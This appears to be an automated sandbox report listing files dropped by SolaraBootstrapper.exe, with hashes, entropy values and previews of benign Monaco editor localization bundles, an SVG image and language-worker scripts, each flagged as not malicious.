                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.(function(){.var e,t=["require","exports","vs/base/common/lifecycle","vs/editor/common/core/range","vs/nls","vs/nls!vs/editor/editor.main","vs/base/common/event","vs/base/common/strings","vs/base/common/winjs.base","vs/base/browser/dom","vs/css!vs/editor/editor.main","vs/editor/browser/editorExtensions","vs/base/common/errors","vs/platform/instantiation/common/instantiation","vs/editor/common/core/position","vs/base/common/platform","vs/platform/theme/common/themeService","vs/editor/common/modes","vs/base/common/async","vs/platform/contextkey/common/contextkey","vs/editor/common/core/selection","vs/editor/common/editorContextKeys","vs/base/common
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (9683)
                                                  Category:dropped
                                                  Size (bytes):37318
                                                  Entropy (8bit):4.92687331950216
                                                  Encrypted:false
                                                  SSDEEP:768:jADv7LbgRyefe80QqYax/mZgb2ET1UZ0IMlYmz7w0hxH1N1Bg93RyFGAIDB7wZ9m:jADDx80QqYax/mmb2YLIEYmz7JhxH10D
                                                  MD5:4D83BC1BCED6F773423BE6F939472CFE
                                                  SHA1:1B42889A7F580DF9F7D399C33141D38548143ED1
                                                  SHA-256:0DEE462D5FB231F169F6CBC432465A43FD445C011FE650E29F5FB2BCCC31EAAE
                                                  SHA-512:C53D522438767A15B5711099FEE0ACB62FF21289B62640D1A4823A90C8A7D8836BC932DAAE477D5188B1BA78C50C581284C4D7379EFB532F37D356ADD97AC8E4
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.define("vs/editor/editor.main.nls.de",{"vs/base/browser/ui/actionbar/actionbar":["{0} ({1})"],"vs/base/browser/ui/aria/aria":["{0} (erneut aufgetreten)"],"vs/base/browser/ui/findinput/findInput":["Eingabe"],"vs/base/browser/ui/findinput/findInputCheckboxes":["Gro.-/Kleinschreibung beachten","Nur ganzes Wort suchen","Regul.ren Ausdruck verwenden"],"vs/base/browser/ui/inputbox/inputBox":["Fehler: {0}","Warnung: {0}","Info: {0}"],"vs/base/browser/ui/selectBox/selectBoxCustom":["{0}"],"vs/base/common/keybindingLabels":["STRG","UMSCHALTTASTE","ALT","Windows","STRG","UMSCHALTTASTE","ALT","Befehlstaste","STRG","UMSCHALTTASTE","ALT","Windows"],"vs/base
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (9730)
                                                  Category:dropped
                                                  Size (bytes):38100
                                                  Entropy (8bit):4.681864668613935
                                                  Encrypted:false
                                                  SSDEEP:384:hwuiA9wZFjNzWZQz7uDlnDEuoKZvGrkEq1EhBR3H6Sg4eUz+JWCHcxS+S9SxS9tf:Y9ZCZQOtDZSj1XJS+S9SxS9tx78teB
                                                  MD5:B371235F971BAA51F58F123F40C4435A
                                                  SHA1:843D4A2D214C7D9DA650CF4D0C6981AC1DAB69C6
                                                  SHA-256:203FF3591E02EB7B55A591E53919CC337F8DEA73E6446FC3493227761C0794BA
                                                  SHA-512:77D43490F1208DDE16B6773551EA983CB2352455178EA0E3D4D4B2F2E05DC406CAFAE89738001D708B780B58882CF5448EB7A8D1C11AA7B8E87915A390DA618A
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.define("vs/editor/editor.main.nls.es",{"vs/base/browser/ui/actionbar/actionbar":["{0} ({1})"],"vs/base/browser/ui/aria/aria":["{0} (ocurri. de nuevo)"],"vs/base/browser/ui/findinput/findInput":["entrada"],"vs/base/browser/ui/findinput/findInputCheckboxes":["Coincidir may.sculas y min.sculas","Solo palabras completas","Usar expresi.n regular"],"vs/base/browser/ui/inputbox/inputBox":["Error: {0}","Advertencia: {0}","Informaci.n: {0}"],"vs/base/browser/ui/selectBox/selectBoxCustom":["{0}"],"vs/base/common/keybindingLabels":["Ctrl","May.s","Alt","Windows","Control","May.s","Alt","Comando","Control","May.s","Alt","Windows"],"vs/base/common/sev
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (10607)
                                                  Category:dropped
                                                  Size (bytes):41201
                                                  Entropy (8bit):4.78528892641439
                                                  Encrypted:false
                                                  SSDEEP:768:HlKogi6Q3JbQWxxGmmrHeHPO10xSgGvJ1COIoJoZjbEMO9ms:Hl8KbQwKRavGJoZG
                                                  MD5:D319E61FC6B357B9A5D8E3BBAA44CE3C
                                                  SHA1:B1539B082B2B8290F05DFE17D6FEE3D64B2EC244
                                                  SHA-256:7FDE40B2B212D274617232DE09452C6CB896E8A3C6B9E0B459F067CD07F31A99
                                                  SHA-512:6BA80B90242DC55ECFA1678E7F8506ED9ADD4BF08067B125BA63D42B8E8E4455507A86369F6FAC6C9D10565D083E7364D4FC79D62E9BD460FE49957C91F598E6
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.define("vs/editor/editor.main.nls.fr",{"vs/base/browser/ui/actionbar/actionbar":["{0} ({1})"],"vs/base/browser/ui/aria/aria":["{0} (s'est reproduit)"],"vs/base/browser/ui/findinput/findInput":["entr.e"],"vs/base/browser/ui/findinput/findInputCheckboxes":["Respecter la casse","Mot entier","Utiliser une expression r.guli.re"],"vs/base/browser/ui/inputbox/inputBox":["Erreur.: {0}","Avertissement.: {0}","Information.: {0}"],"vs/base/browser/ui/selectBox/selectBoxCustom":["{0}"],"vs/base/common/keybindingLabels":["Ctrl","Maj","Alt","Windows","Contr.le","Maj","Alt","Commande","Contr.le","Maj","Alt","Windows"],"vs/base/common/severity":["Erreur"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (10625)
                                                  Category:dropped
                                                  Size (bytes):39483
                                                  Entropy (8bit):4.645063474403644
                                                  Encrypted:false
                                                  SSDEEP:768:4klNUuMam1xYhz2LyXSXBjlHtvnYyjMbRgD5SL2KAqI0UGmGfpspuoeu317K93Ph:5f0SL2KAqKKNpCi
                                                  MD5:A8855A662EB4D3A771FDAB7BA6287DEF
                                                  SHA1:A78B57810AC8E9704E97897C6168F4140D2EADF7
                                                  SHA-256:F67CEC6DBF98C98C834638D20DF53C5A770EDADA7F26EBF6D0B7DFEC60F7A4AB
                                                  SHA-512:1C03F8B243701870D8A17E5565DA6C65C3F1D76DFB55C88CF68578A4754434A071565DA9147E7C833DE588A5907B5ECE07E018DEC52C79D9B2914C964A48A4B5
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.define("vs/editor/editor.main.nls.it",{"vs/base/browser/ui/actionbar/actionbar":["{0} ({1})"],"vs/base/browser/ui/aria/aria":["{0} (nuova occorrenza)"],"vs/base/browser/ui/findinput/findInput":["input"],"vs/base/browser/ui/findinput/findInputCheckboxes":["Maiuscole/minuscole","Parola intera","Usa espressione regolare"],"vs/base/browser/ui/inputbox/inputBox":["Errore: {0}","Avviso: {0}","Info: {0}"],"vs/base/browser/ui/selectBox/selectBoxCustom":["{0}"],"vs/base/common/keybindingLabels":["CTRL","MAIUSC","ALT","Windows","CTRL","MAIUSC","ALT","Comando","CTRL","MAIUSC","ALT","Windows"],"vs/base/common/severity":["Errore","Avviso","Informazioni"],"vs/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (5031)
                                                  Category:dropped
                                                  Size (bytes):42617
                                                  Entropy (8bit):5.654455164447412
                                                  Encrypted:false
                                                  SSDEEP:384:hIDtFoY0u0ZAITlMRFG1yu9RwJUcQ8bo6CdXtK+c3YcnI+PjnN3H6Sg4dcRID9Dh:VW6RwJrQNdbc9N1aBDzTG7e2ZLlx/
                                                  MD5:A1F3C9E940206CA310147D644305A6E1
                                                  SHA1:005A8F7023B9D873962C7272203CC0C0D0CCC624
                                                  SHA-256:EA9F5E8993017F858CD9EE70AAC3D7990CA85EAF40A052025E530FB1C300837F
                                                  SHA-512:F98AD1E4C127C3AA4A4FF2FA7ED2A65B5D32644211679E42D70AAE03F9C0AF1DA7704061C28E95CBB25AD14745B1D086C9A49492119D0F97653A0B817823BC69
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.define("vs/editor/editor.main.nls.ja",{"vs/base/browser/ui/actionbar/actionbar":["{0} ({1})"],"vs/base/browser/ui/aria/aria":["{0} (..)"],"vs/base/browser/ui/findinput/findInput":[".."],"vs/base/browser/ui/findinput/findInputCheckboxes":["............",".........","........."],"vs/base/browser/ui/inputbox/inputBox":["...: {0}","..: {0}","..: {0}"],"vs/base/browser/ui/selectBox/selectBoxCustom":["{0}"],"vs/base/common/keybindingLabels":["Ctrl","Shift","Alt","Windows","Control","Shift","Alt","....","Control","Shift","Alt","Windows"],"vs/base/common/severity":[
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (8613)
                                                  Category:dropped
                                                  Size (bytes):32364
                                                  Entropy (8bit):4.788014155134628
                                                  Encrypted:false
                                                  SSDEEP:384:h03CdtOurX25WyV1Vdf40CJjocZC6F7PKUvRjAaswHq9x3H6Sg4NFVlQlUDZpLjb:23mmysb1zVes3pxCSgwgwjhb
                                                  MD5:74DD2381DDBB5AF80CE28AEFED3068FC
                                                  SHA1:0996DC91842AB20387E08A46F3807A3F77958902
                                                  SHA-256:FDD9D64CE5284373D1541528D15E2AA8AA3A4ADC11B51B3D71D3A3953F8BCC48
                                                  SHA-512:8841E0823905CF3168F388A7AEAF5EDD32D44902035BA2078202193354CAF8CD74CB4CAB920E455404575739F35E19EA5F3D88EAB012C4EBEFC0CCB1ED19A46E
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.define("vs/editor/editor.main.nls",{"vs/base/browser/ui/actionbar/actionbar":["{0} ({1})"],"vs/base/browser/ui/aria/aria":["{0} (occurred again)"],"vs/base/browser/ui/findinput/findInput":["input"],"vs/base/browser/ui/findinput/findInputCheckboxes":["Match Case","Match Whole Word","Use Regular Expression"],"vs/base/browser/ui/inputbox/inputBox":["Error: {0}","Warning: {0}","Info: {0}"],"vs/base/browser/ui/selectBox/selectBoxCustom":["{0}"],"vs/base/common/keybindingLabels":["Ctrl","Shift","Alt","Windows","Control","Shift","Alt","Command","Control","Shift","Alt","Windows"],"vs/base/common/severity":["Error","Warning","Info"],"vs/base/parts/quickop
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (5254)
                                                  Category:dropped
                                                  Size (bytes):37861
                                                  Entropy (8bit):5.883000229335848
                                                  Encrypted:false
                                                  SSDEEP:384:hS67TmO5oU1Yh4XK8ApE6/z2dHDNV1KiAaA+17tDDN3H6Sg4s/zKz8G3uyroDXYd:rmO5oGXrmi1zDB12zKzuyroKcNVk
                                                  MD5:9CCF83D22E9A9BFAFA2000F366AC47E6
                                                  SHA1:BE61E121AF1A363AA66D875F46E78562A603566E
                                                  SHA-256:100CA482C015571ED9AAD97C2DCC5E266B270A650CE892507443B5D4F32DF64F
                                                  SHA-512:3D68816994ABFF5C528610733CC729E91D390422C2EE2259DCEF3CC4DB9A599C1F3800F412259FE2F9A700BF2847B942A253986C011C659868BC9EDAAE6C2F16
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.define("vs/editor/editor.main.nls.ko",{"vs/base/browser/ui/actionbar/actionbar":["{0}({1})"],"vs/base/browser/ui/aria/aria":["{0}(.. ...)"],"vs/base/browser/ui/findinput/findInput":[".."],"vs/base/browser/ui/findinput/findInputCheckboxes":["./... ..",".. ...","... .."],"vs/base/browser/ui/inputbox/inputBox":["..: {0}","..: {0}","..: {0}"],"vs/base/browser/ui/selectBox/selectBoxCustom":["{0}"],"vs/base/common/keybindingLabels":["Ctrl","<Shift>","Alt","Windows","...","<Shift>","Alt","..","...","<Shift>","Alt","Windows"],"vs/base/common/severity":["..","..",".."],"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (9755)
                                                  Category:dropped
                                                  Size (bytes):57423
                                                  Entropy (8bit):4.754950263828743
                                                  Encrypted:false
                                                  SSDEEP:768:CXH0AKgvFBBK1ED81Z0LVdcan9oUxPr1TPgFuEFYPm/XftWZc:CXHXNtBBK1SLVdcan9oWPgFuEFYPm/d
                                                  MD5:FD1AA66906D2B3C0C9B734B17F04D73B
                                                  SHA1:299145469D5D5397A42274CCC908C865EBC46CFA
                                                  SHA-256:FA180F7B77EE252AEFE73BA5993FBE7C89F43482358D7FD32E8E2F50B3B21BED
                                                  SHA-512:235C2EA1806C13DC0B85F06B5C9F2F811BD145968E2A0AD47C3FA1E063D408EFC034DCA7BAF0B91942CC34E995D1274692C5556C2FB875DBB1054157DA9C0132
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.define("vs/editor/editor.main.nls.ru",{"vs/base/browser/ui/actionbar/actionbar":["{0} ({1})"],"vs/base/browser/ui/aria/aria":["{0} (......... .....)"],"vs/base/browser/ui/findinput/findInput":["...."],"vs/base/browser/ui/findinput/findInputCheckboxes":[". ...... ........","..... .......","............ .......... ........."],"vs/base/browser/ui/inputbox/inputBox":["......: {0}","..............: {0}","........: {0}"],"vs/base/browser/ui/selectBox/selectBoxCustom":["{0}"],"vs/base/common/keybindingLabels":["CTRL","SHIFT","ALT","....... Wind
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (3446)
                                                  Category:dropped
                                                  Size (bytes):30493
                                                  Entropy (8bit):6.34437792445931
                                                  Encrypted:false
                                                  SSDEEP:768:FzMPbIhYBG5OcP2WyCzVsEJvjA1agnGMR:F8fcPN8Gw
                                                  MD5:F954AC1091C6D0B640ED5F0ABDCD8ADB
                                                  SHA1:43E0D5E39910D124C384549DF0B119AD1EBB12B3
                                                  SHA-256:AC881E6F56544ED9B8DD4FD8FD8A73F1DA864FB8D79D91C45F5A51F923BD5287
                                                  SHA-512:8AFF4877BF97CA29DFD5555FE5078ED3F05AC99C43F12C9B1C4D77CA11B1D040A81E0769C10A46A0BB32F3FFE72AE1A223FAF5276D05A11F981AA7677E140C83
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.define("vs/editor/editor.main.nls.zh-cn",{"vs/base/browser/ui/actionbar/actionbar":["{0} ({1})"],"vs/base/browser/ui/aria/aria":["{0} (.....)"],"vs/base/browser/ui/findinput/findInput":[".."],"vs/base/browser/ui/findinput/findInputCheckboxes":[".....","....","......."],"vs/base/browser/ui/inputbox/inputBox":["..: {0}","..: {0}","..: {0}"],"vs/base/browser/ui/selectBox/selectBoxCustom":["{0}"],"vs/base/common/keybindingLabels":["Ctrl","Shift","Alt","Windows","Control","Shift","Alt","Command","Control","Shift","Alt","Windows"],"vs/base/common/severity":["..","..",".."],"vs/base/p
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (3882)
                                                  Category:dropped
                                                  Size (bytes):30734
                                                  Entropy (8bit):6.335664297102438
                                                  Encrypted:false
                                                  SSDEEP:768:pEOtM9oECeRbdFF0D1N+QZyzB0StZ4XUeqJ1wrv6Vl9YLz1/ewyOm:HXEJpdFF0xN+QyoUeqJ1wrv6Vl9Y8wo
                                                  MD5:73031FF9956DA03354038B3185222AF8
                                                  SHA1:712CBF8027CAE6C422490499538EC4A0928C6A78
                                                  SHA-256:7751DF224AC12DBC2E918B12FDBAA465306B6C511E4E1587790163EDAC18AD46
                                                  SHA-512:48B80E78A6751FF58EB33AE92F3AD0E31D2E719D9DC9F4926DB41E44F8CA9819CEA7B657196F4F96C8A1291D57C59C70FFCD64CC9F8CDFFC12BC6B5FF6C50E77
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.define("vs/editor/editor.main.nls.zh-tw",{"vs/base/browser/ui/actionbar/actionbar":["{0} ({1})"],"vs/base/browser/ui/aria/aria":["{0} (....)"],"vs/base/browser/ui/findinput/findInput":[".."],"vs/base/browser/ui/findinput/findInputCheckboxes":["......",".......","......."],"vs/base/browser/ui/inputbox/inputBox":["..: {0}","..: {0}","..: {0}"],"vs/base/browser/ui/selectBox/selectBoxCustom":["{0}"],"vs/base/common/keybindingLabels":["Ctrl","Shift","Alt","Windows","Control","Shift","Alt","Command","Control","Shift","Alt","Windows"],"vs/base/common/severity":["..","..",".."],"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:dropped
                                                  Size (bytes):20729
                                                  Entropy (8bit):4.425768984174885
                                                  Encrypted:false
                                                  SSDEEP:384:cyPJZCcKWPJuCNoSmvcar1PNY6g2HdSjEc3/WD3:DCdCNkvcaQ6x9SjES/W7
                                                  MD5:649FB0A55B0E0FC9D79E6B7872A14C10
                                                  SHA1:B33619C9DFD65D3F2E5A5FCB767A752123D51607
                                                  SHA-256:FCC3026B97068F3D9E1743D36CA26B96FFDBCD2841FA9D804CACCC4F249911C8
                                                  SHA-512:3FB4B07E9313B69C84F887C9CA0464E4C8D06A98A8F2AD7D0B48452D068BD526004C21633D0279B4B5E17AD882ACF8C7E99B4C3E7650BE43B495B670A87D0CBD
                                                  Malicious:false
                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="300" height="40"><path d="M288.483 33c-.772 0-1.497-.123-2.153-.365-.678-.253-1.27-.617-1.76-1.084-.5-.475-.892-1.049-1.163-1.704-.27-.644-.407-1.371-.407-2.158 0-.517.061-1.018.178-1.49.116-.47.29-.925.516-1.348.225-.422.508-.815.844-1.167.334-.352.717-.656 1.139-.905.416-.246.881-.44 1.38-.576.493-.134 1.026-.202 1.587-.202.705 0 1.382.109 2.013.324.642.217 1.218.538 1.708.955.501.425.903.948 1.193 1.556.294.623.442 1.316.442 2.064 0 .619-.09 1.185-.268 1.679-.178.492-.42.92-.721 1.275-.331.377-.699.658-1.104.847l-.048.022v1.53l-.587.266c-.128.059-.288.117-.474.179-.193.062-.404.114-.645.159-.229.04-.477.076-.753.103-.27.027-.578.04-.917.04z" fill="#2D2D2D"/><path d="M291.716 24.041c-.396-.336-.856-.593-1.384-.771-.527-.18-1.09-.271-1.689-.271-.473 0-.912.055-1.324.167-.414.112-.791.27-1.135.473-.342.202-.65.446-.922.733-.273.286-.502.602-.686.949-.186.347-.33.722-.428 1.119-.1.399-.148.814-.148 1.247 0 .652.109 1.247.332 1.776.219.531.5
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (21640)
                                                  Category:dropped
                                                  Size (bytes):22035
                                                  Entropy (8bit):5.1216983038953
                                                  Encrypted:false
                                                  SSDEEP:384:h1kwG9aih9phed6ZwRVwCs8fTxUfyP0sYrkoJWMGIk8:aQih9pwd6KsuTxUfyFikkWMGC
                                                  MD5:40A99739F89D382C92EB26F05A9A4497
                                                  SHA1:30E6C52658F49BF5C6103A95D1C3ED50D71B02F2
                                                  SHA-256:D3108AF9FFCDAD3133345686646CAFE3B628AD6B25A3758786B2AA7B7B51809D
                                                  SHA-512:9011557BC41865DC6B44495174EA2F27C700E95DABDAA67D8BDD4B798A367A29CEA91DEF2171C5176160F5791D7BFCC2CD65B58DB4DED721ED2868E4198049E7
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-css version: 2.1.1(a021ab7a38731f54509ae2a95507f8165728cd2f). * Released under the MIT license. * https://github.com/Microsoft/monaco-css/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/language/css/workerManager",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var s=monaco.Promise,n=function(){function e(e){var t=this;this._defaults=e,this._worker=null,this._idleCheckInterval=setInterval(function(){return t._checkIfIdle()},3e4),this._lastUsedTime=0,this._configChangeListener=this._defaults.onDidChange(function(){return t._stopWorker()})}return e.prototype._stopWorker=function(){this._worker&&(this._worker.dispose(),this._worker=null),this._client=null},e.prototype.dispose=function(){clearInterval(this._idleCheckInterval
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (65129)
                                                  Category:dropped
                                                  Size (bytes):501334
                                                  Entropy (8bit):5.087045111731214
                                                  Encrypted:false
                                                  SSDEEP:6144:PhKjqIze+tAxt+A7zOM1L0G52ppgGDcoFGPL2gXwiOcFt+oiEipHxJKnVZPUsf:IqkA7zO/pUIPsf
                                                  MD5:152244E2AB4F663141E9466A8282EBE8
                                                  SHA1:E9C0E86FBC108600D3E42A6654C5DE073607DDCE
                                                  SHA-256:288BB68A2C685957B5DC3E5353B1A03DC482B10858059063B99C1549D5FEF01C
                                                  SHA-512:112039647883A1CDB6A860CE1D2980562222B593508DA1EA8C9838B7184E76F72DE9EB68D2727CE12C78E3C0BE7E85101591DF6EBDE1E73DCF8C2495C8454855
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-css version: 2.1.1(a021ab7a38731f54509ae2a95507f8165728cd2f). * Released under the MIT license. * https://github.com/Microsoft/monaco-css/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.!function(e){if("object"==typeof module&&"object"==typeof module.exports){var t=e(require,exports);void 0!==t&&(module.exports=t)}else"function"==typeof define&&define.amd&&define("vscode-languageserver-types/main",["require","exports"],e)}(function(e,t){"use strict";var o,n,r,i,s,a,l,c,h,d,p,m,u;Object.defineProperty(t,"__esModule",{value:!0}),(n=o=t.Position||(t.Position={})).create=function(e,t){return{line:e,character:t}},n.is=function(e){var t=e;return O.defined(t)&&O.number(t.line)&&O.number(t.character)},(i=r=t.Range||(t.Range={})).create=function(e,t,n,r){if(O.number(e)&&O.number(t)&&O.numb
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (18735)
                                                  Category:dropped
                                                  Size (bytes):19132
                                                  Entropy (8bit):5.130179120102356
                                                  Encrypted:false
                                                  SSDEEP:192:hA6ZF2Cw7DrFcelxzEKfxmflhyLpYvws8edvt9vKVwZVtDFzp6RMSyotuK1sD5Sv:hJw7DTfAlhCpvedmw+MS+KOD5Sc7Pzo
                                                  MD5:C944AD9527D22B6CA6C0D54FD0723296
                                                  SHA1:DDFB323DED66DE709FA8B05ABE0ADA931AC9DD43
                                                  SHA-256:80D6F099563AF129B4DEFF66F7B9D4DFB27AD0058DCB5B77D927E460022DAFEE
                                                  SHA-512:3A6ABB3A15401D28E4926AC008F991B7A19B359C8420D7E5BB6804061B6F82A2BEDFB86823862E1CCFBC046E896CB1A5759199F7E723FD7B1B5E6AEB19F92F58
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-html version: 2.1.1(f878fb07da50bca46d9e65888f2633d6b0338cee). * Released under the MIT license. * https://github.com/Microsoft/monaco-html/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/language/html/workerManager",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var s=monaco.Promise,n=function(){function e(e){var t=this;this._defaults=e,this._worker=null,this._idleCheckInterval=setInterval(function(){return t._checkIfIdle()},3e4),this._lastUsedTime=0,this._configChangeListener=this._defaults.onDidChange(function(){return t._stopWorker()})}return e.prototype._stopWorker=function(){this._worker&&(this._worker.dispose(),this._worker=null),this._client=null},e.prototype.dispose=function(){clearInterval(this._idleCheckInter
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (65135)
                                                  Category:dropped
                                                  Size (bytes):157807
                                                  Entropy (8bit):5.6223380135187
                                                  Encrypted:false
                                                  SSDEEP:3072:wNxSv2ym9FNq9m8iktJFu/TgHdcyDnLEOhUm3xSvp:wNxSv2ym9FNimBmFu/TgHdcgnLEOhUmE
                                                  MD5:3F5802A91A29E4504D5CD2F10AC280B8
                                                  SHA1:368D01E59EAF25F164AB1D80B7F5D74B625B242D
                                                  SHA-256:E80444D8FA519FF86E5C696A40843BC8392B2D3AFB83118A2DD92DA5497C9212
                                                  SHA-512:2F3670227710C291E5E9136B2CAC5C70421C2537B86219FE17ED33161136A08F5CB2069822B16A58CE377B6D1A265CF33215A1695BDA5A701BAE566410CE33E7
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-html version: 2.1.1(f878fb07da50bca46d9e65888f2633d6b0338cee). * Released under the MIT license. * https://github.com/Microsoft/monaco-html/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vscode-nls/vscode-nls",["require","exports"],function(e,t){"use strict";function n(e,t){for(var n,r,i=[],a=2;a<arguments.length;a++)i[a-2]=arguments[a];return n=t,0===(r=i).length?n:n.replace(/\{(\d+)\}/g,function(e,t){var n=t[0];return void 0!==r[n]?r[n]:e})}function r(e){return n}Object.defineProperty(t,"__esModule",{value:!0}),t.loadMessageBundle=r,t.config=function(e){return r}}),define("vscode-nls",["vscode-nls/vscode-nls"],function(e){return e}),function(e){if("object"==typeof module&&"object"==typeof module.exports){var t=e(require,exports);void 0!==t&&(module.exports=t)}else"funct
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (38704)
                                                  Category:dropped
                                                  Size (bytes):39101
                                                  Entropy (8bit):5.281284309885852
                                                  Encrypted:false
                                                  SSDEEP:768:ghT0rpM0GwBsUWdD5Sw7NibC2FyGf5Zot3OYoHAymtVoQvafg+HfNc75eEWAdy0h:gyM0GwBeD5jhiA3B7VjIQfdy0h
                                                  MD5:44955B6C43B7AAC58492233EFEEB70AD
                                                  SHA1:528B1F0D8EBCE7A607C008AA66A1D0ECD903D3D3
                                                  SHA-256:08AF59E449F6C058514BF05C54511EE6EC83934AB9DC3E803257196B2812E8AE
                                                  SHA-512:5A86921260AE9F87EB134513809231C9B512200CD2F330DF37A098124DB0DA8C8BCEF5DC668875E21328CE9A6C79440811DBBC3371147690C71D31B97745666E
                                                  Malicious:false
